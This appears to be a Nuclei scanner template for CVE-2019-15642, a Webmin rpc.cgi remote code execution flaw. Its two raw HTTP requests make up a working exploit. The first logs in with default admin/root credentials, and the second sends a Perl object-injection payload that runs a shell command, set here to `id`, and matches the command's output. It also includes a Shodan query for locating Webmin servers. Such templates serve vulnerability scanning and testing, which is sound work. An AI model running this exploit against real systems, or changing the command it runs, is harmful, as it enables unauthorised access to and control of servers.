id: cve-2019-15642 info: name: Webmin < 1.920 - Authenticated Remote Code Execution author: pussycat0x severity: high description: | rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-15642 - https://github.com/jas502n/CVE-2019-15642 metadata: max-request: 2 verified: true shodan-query: title:"Webmin" tags: cve,cve2019,webmin,rce variables: cmd: '`id`' http: - raw: - | POST /session_login.cgi HTTP/1.1 Host: {{Hostname}} Cookie: redirect=1; testing=1 Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}} Accept-Encoding: gzip, deflate user={{username}}&pass={{password}} - | POST /rpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1 Accept-Encoding: gzip, deflate OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n"; attack: pitchfork payloads: username: - admin - root password: - admin - root stop-at-first-match: true host-redirects: true cookie-reuse: true matchers-condition: and matchers: - type: regex part: body_2 regex: - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)' - type: word part: body_2 words: - "Content-type: text/plain" - type: status status: - 200